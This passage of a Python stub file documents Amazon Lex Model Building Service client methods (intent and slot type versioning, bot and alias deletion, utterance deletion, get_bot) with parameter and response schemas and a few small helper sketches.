The date when the bot version was created.
idleSessionTTLInSeconds (integer) --
The maximum time in seconds that Amazon Lex retains the data gathered in a conversation. For more information, see PutBot .
voiceId (string) --
The Amazon Polly voice ID that Amazon Lex uses for voice interactions with the user.
checksum (string) --
Checksum identifying the version of the bot that was created.
version (string) --
The version of the bot.
locale (string) --
Specifies the target locale for the bot.
childDirected (boolean) --
For each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.
If your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.
detectSentiment (boolean) --
Indicates whether utterances entered by the user should be sent to Amazon Comprehend for sentiment analysis.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
"""
pass
def create_intent_version(name=None, checksum=None):
"""
Creates a new version of an intent based on the $LATEST version of the intent. If the $LATEST version of this intent hasn\'t changed since you last updated it, Amazon Lex doesn\'t create a new version. It returns the last version you created.
When you create a version of an intent, Amazon Lex sets the version to 1. Subsequent versions increment by 1. For more information, see versioning-intro .
This operation requires permissions to perform the lex:CreateIntentVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.create_intent_version(
name='string',
checksum='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent that you want to create a new version of. The name is case sensitive.\n
:type checksum: string
:param checksum: Checksum of the $LATEST version of the intent that should be used to create the new version. If you specify a checksum and the $LATEST version of the intent has a different checksum, Amazon Lex returns a PreconditionFailedException exception and doesn\'t publish a new version. If you don\'t specify a checksum, Amazon Lex publishes the $LATEST version.
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the intent.
description (string) --
A description of the intent.
slots (list) --
An array of slot types that defines the information required to fulfill the intent.
(dict) --
Identifies the version of a specific slot.
name (string) --
The name of the slot.
description (string) --
A description of the slot.
slotConstraint (string) --
Specifies whether the slot is required or optional.
slotType (string) --
The type of the slot, either a custom slot type that you defined or one of the built-in slot types.
slotTypeVersion (string) --
The version of the slot type.
valueElicitationPrompt (dict) --
The prompt that Amazon Lex uses to elicit the slot value from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
priority (integer) --
Specifies the order in which Amazon Lex elicits this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, Amazon Lex first elicits a value for the slot with priority 1.
If multiple slots share the same priority, the order in which Amazon Lex elicits values is arbitrary.
sampleUtterances (list) --
If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.
(string) --
responseCard (string) --
A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.
obfuscationSetting (string) --
Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is "full_name", obfuscated values are replaced with "{full_name}". For more information, see Slot Obfuscation .
sampleUtterances (list) --
An array of sample utterances configured for the intent.
(string) --
confirmationPrompt (dict) --
If defined, the prompt that Amazon Lex uses to confirm the user\'s intent before fulfilling it.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in confirmationPrompt , Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
followUpPrompt (dict) --
If defined, Amazon Lex uses this prompt to solicit additional user activity after the intent is fulfilled.
prompt (dict) --
Prompts for information from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
conclusionStatement (dict) --
After the Lambda function specified in the fulfillmentActivity field fulfills the intent, Amazon Lex conveys this statement to the user.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
dialogCodeHook (dict) --
If defined, Amazon Lex invokes this Lambda function for each user input.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
fulfillmentActivity (dict) --
Describes how the intent is fulfilled.
type (string) --
How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.
codeHook (dict) --
A description of the Lambda function that is run to fulfill the intent.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
parentIntentSignature (string) --
A unique identifier for a built-in intent.
lastUpdatedDate (datetime) --
The date that the intent was updated.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version number assigned to the new version of the intent.
checksum (string) --
Checksum of the intent version created.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
:returns:
(string) --
"""
pass
def create_slot_type_version(name=None, checksum=None):
"""
Creates a new version of a slot type based on the $LATEST version of the specified slot type. If the $LATEST version of this resource has not changed since the last version that you created, Amazon Lex doesn\'t create a new version. It returns the last version that you created.
When you create a version of a slot type, Amazon Lex sets the version to 1. Subsequent versions increment by 1. For more information, see versioning-intro .
This operation requires permissions for the lex:CreateSlotTypeVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.create_slot_type_version(
name='string',
checksum='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type that you want to create a new version for. The name is case sensitive.\n
:type checksum: string
:param checksum: Checksum for the $LATEST version of the slot type that you want to publish. If you specify a checksum and the $LATEST version of the slot type has a different checksum, Amazon Lex returns a PreconditionFailedException exception and doesn\'t publish the new version. If you don\'t specify a checksum, Amazon Lex publishes the $LATEST version.
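The checksum acts as an optimistic lock: read the $LATEST checksum, publish with it, and retry if the slot type changed in between. A minimal sketch of that flow, assuming `client` is a `boto3.client('lex-models')` instance; `publish_slot_type` is a hypothetical helper name, not part of the API:

```python
def publish_slot_type(client, name):
    """Publish a new slot type version only if $LATEST is unchanged.

    Hypothetical helper; retries once if $LATEST moved under us.
    """
    latest = client.get_slot_type(name=name, version='$LATEST')
    try:
        return client.create_slot_type_version(
            name=name, checksum=latest['checksum'])
    except client.exceptions.PreconditionFailedException:
        # Someone edited $LATEST between our read and the publish;
        # re-read the checksum and try again.
        latest = client.get_slot_type(name=name, version='$LATEST')
        return client.create_slot_type_version(
            name=name, checksum=latest['checksum'])
```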
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
Response Structure
(dict) --
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
enumerationValues (list) --
A list of EnumerationValue objects that defines the values that the slot type can take.
(dict) --
Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.
For example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values thick, thin, and stuffed.
value (string) --
The value of the slot type.
synonyms (list) --
Additional values related to the slot type value.
(string) --
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last update date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version assigned to the new slot type version.
checksum (string) --
Checksum of the $LATEST version of the slot type.
valueSelectionStrategy (string) --
The strategy that Amazon Lex uses to determine the value of the slot. For more information, see PutSlotType .
parentSlotTypeSignature (string) --
The built-in slot type used as the parent of the slot type.
slotTypeConfigurations (list) --
Configuration information that extends the parent built-in slot type.
(dict) --
Provides configuration information for a slot type.
regexConfiguration (dict) --
A regular expression used to validate the value of a slot.
pattern (string) --
A regular expression used to validate the value of a slot.
Use a standard regular expression. Amazon Lex supports the following characters in the regular expression:
A-Z, a-z
0-9
Unicode characters ("\\u<Unicode>")
Represent Unicode characters with four digits, for example "\\u0041" or "\\u005A".
The following regular expression operators are not supported:
Infinite repeaters: *, +, or {x,} with no upper bound.
Wild card (.)
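The restrictions above can be checked before calling the API. A sketch of a hypothetical pre-flight validator (not part of the Lex API) that rejects the unsupported operators:

```python
import re

def is_lex_safe_pattern(pattern):
    """Return True if `pattern` avoids the regex operators Amazon Lex
    rejects in slot type patterns. Hypothetical pre-flight check only."""
    # Infinite repeaters: unescaped * or +.
    if re.search(r"(?<!\\)[*+]", pattern):
        return False
    # {x,} with no upper bound.
    if re.search(r"\{\d+,\}", pattern):
        return False
    # The unescaped wildcard '.'.
    if re.search(r"(?<!\\)\.", pattern):
        return False
    return True

# Bounded repetition is fine; open-ended repetition is not.
print(is_lex_safe_pattern(r"[A-Z]{2}\d{3}"))  # True
print(is_lex_safe_pattern(r"[0-9]+"))         # False
```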
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
:returns:
thick
thin
stuffed
"""
pass
def delete_bot(name=None):
"""
Deletes all versions of the bot, including the $LATEST version. To delete a specific version of the bot, use the DeleteBotVersion operation. The DeleteBot operation doesn\'t immediately remove the bot schema. Instead, it is marked for deletion and removed later.
Amazon Lex stores utterances indefinitely for improving the ability of your bot to respond to user inputs. These utterances are not removed when the bot is deleted. To remove the utterances, use the DeleteUtterances operation.
If a bot has an alias, you can\'t delete it. Instead, the DeleteBot operation returns a ResourceInUseException exception that includes a reference to the alias that refers to the bot. To remove the reference to the bot, delete the alias. If you get the same exception again, delete the referring aliases until the DeleteBot operation succeeds.
This operation requires permissions for the lex:DeleteBot action.
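The alias-then-bot flow described above can be sketched as a retry loop, assuming `client` is a `boto3.client('lex-models')` instance; the function name and retry bound are illustrative:

```python
def delete_bot_and_aliases(client, bot_name, max_tries=5):
    """Delete a bot, removing referring aliases when Lex reports them.

    Sketch only: assumes `client` is boto3.client('lex-models').
    """
    for _ in range(max_tries):
        try:
            client.delete_bot(name=bot_name)
            return True
        except client.exceptions.ResourceInUseException:
            # An alias still refers to the bot; delete the aliases and retry.
            aliases = client.get_bot_aliases(botName=bot_name)
            for alias in aliases.get('BotAliases', []):
                client.delete_bot_alias(name=alias['name'], botName=bot_name)
    return False
```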
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot(
name='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot. The name is case sensitive.\n
"""
pass
def delete_bot_alias(name=None, botName=None):
"""
Deletes an alias for the specified bot.
You can\'t delete an alias that is used in the association between a bot and a messaging channel. If an alias is used in a channel association, the DeleteBot operation returns a ResourceInUseException exception that includes a reference to the channel association that refers to the bot. You can remove the reference to the alias by deleting the channel association. If you get the same exception again, delete the referring associations until the DeleteBotAlias operation succeeds.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot_alias(
name='string',
botName='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the alias to delete. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot that the alias points to.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_bot_channel_association(name=None, botName=None, botAlias=None):
"""
Deletes the association between an Amazon Lex bot and a messaging platform.
This operation requires permission for the lex:DeleteBotChannelAssociation action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot_channel_association(
name='string',
botName='string',
botAlias='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the association. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the Amazon Lex bot.\n
:type botAlias: string
:param botAlias: [REQUIRED]\nAn alias that points to the specific version of the Amazon Lex bot to which this association is being made.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def delete_bot_version(name=None, version=None):
"""
Deletes a specific version of a bot. To delete all versions of a bot, use the DeleteBot operation.
This operation requires permissions for the lex:DeleteBotVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_bot_version(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot.\n
:type version: string
:param version: [REQUIRED]\nThe version of the bot to delete. You cannot delete the $LATEST version of the bot. To delete the $LATEST version, use the DeleteBot operation.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_intent(name=None):
"""
Deletes all versions of the intent, including the $LATEST version. To delete a specific version of the intent, use the DeleteIntentVersion operation.
You can delete a version of an intent only if it is not referenced. To delete an intent that is referred to in one or more bots (see how-it-works ), you must remove those references first.
This operation requires permission for the lex:DeleteIntent action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_intent(
name='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent. The name is case sensitive.\n
"""
pass
def delete_intent_version(name=None, version=None):
"""
Deletes a specific version of an intent. To delete all versions of an intent, use the DeleteIntent operation.
This operation requires permissions for the lex:DeleteIntentVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_intent_version(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent.\n
:type version: string
:param version: [REQUIRED]\nThe version of the intent to delete. You cannot delete the $LATEST version of the intent. To delete the $LATEST version, use the DeleteIntent operation.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_slot_type(name=None):
"""
Deletes all versions of the slot type, including the $LATEST version. To delete a specific version of the slot type, use the DeleteSlotTypeVersion operation.
You can delete a version of a slot type only if it is not referenced. To delete a slot type that is referred to in one or more intents, you must remove those references first.
This operation requires permission for the lex:DeleteSlotType action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_slot_type(
name='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type. The name is case sensitive.\n
"""
pass
def delete_slot_type_version(name=None, version=None):
"""
Deletes a specific version of a slot type. To delete all versions of a slot type, use the DeleteSlotType operation.
This operation requires permissions for the lex:DeleteSlotTypeVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_slot_type_version(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type.\n
:type version: string
:param version: [REQUIRED]\nThe version of the slot type to delete. You cannot delete the $LATEST version of the slot type. To delete the $LATEST version, use the DeleteSlotType operation.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ResourceInUseException
"""
pass
def delete_utterances(botName=None, userId=None):
"""
Deletes stored utterances.
Amazon Lex stores the utterances that users send to your bot. Utterances are stored for 15 days for use with the GetUtterancesView operation, and then stored indefinitely for use in improving the ability of your bot to respond to user input.
Use the DeleteUtterances operation to manually delete stored utterances for a specific user. When you use the DeleteUtterances operation, utterances stored for improving your bot\'s ability to respond to user input are deleted immediately. Utterances stored for use with the GetUtterancesView operation are deleted after 15 days.
This operation requires permissions for the lex:DeleteUtterances action.
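A sketch of purging stored utterances for several users in one pass, assuming `client` is a `boto3.client('lex-models')` instance; `purge_user_utterances` is a hypothetical helper name:

```python
def purge_user_utterances(client, bot_name, user_ids):
    """Delete stored utterances for each user in `user_ids`.

    Sketch only: the user IDs must match those sent in the
    PostContent or PostText requests that contained the utterances.
    """
    purged = []
    for user_id in user_ids:
        client.delete_utterances(botName=bot_name, userId=user_id)
        purged.append(user_id)
    return purged
```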
See also: AWS API Documentation
Exceptions
:example: response = client.delete_utterances(
botName='string',
userId='string'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot that stored the utterances.\n
:type userId: string
:param userId: [REQUIRED]\nThe unique identifier for the user that made the utterances. This is the user ID that was sent in the PostContent or PostText operation request that contained the utterance.\n
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_bot(name=None, versionOrAlias=None):
"""
Returns metadata information for a specific bot. You must provide the bot name and the bot version or alias.
This operation requires permissions for the lex:GetBot action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get configuration information for a bot.
Expected Output:
:example: response = client.get_bot(
name='string',
versionOrAlias='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot. The name is case sensitive.\n
:type versionOrAlias: string
:param versionOrAlias: [REQUIRED]\nThe version or alias of the bot.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
Response Structure
(dict) --
name (string) --
The name of the bot.
description (string) --
A description of the bot.
intents (list) --
An array of intent objects. For more information, see PutBot .
(dict) --
Identifies the specific version of an intent.
intentName (string) --
The name of the intent.
intentVersion (string) --
The version of the intent.
clarificationPrompt (dict) --
The message Amazon Lex uses when it doesn\'t understand the user\'s request. For more information, see PutBot .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
abortStatement (dict) --
The message that Amazon Lex returns when the user elects to end the conversation without completing it. For more information, see PutBot .
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
status (string) --
The status of the bot.
When the status is BUILDING Amazon Lex is building the bot for testing and use.
If the status of the bot is READY_BASIC_TESTING , you can test the bot using the exact utterances specified in the bot\'s intents. When the bot is ready for full testing or to run, the status is READY .
If there was a problem with building the bot, the status is FAILED and the failureReason field explains why the bot did not build.
If the bot was saved but not built, the status is NOT_BUILT .
failureReason (string) --
If status is FAILED , Amazon Lex explains why it failed to build the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
idleSessionTTLInSeconds (integer) --
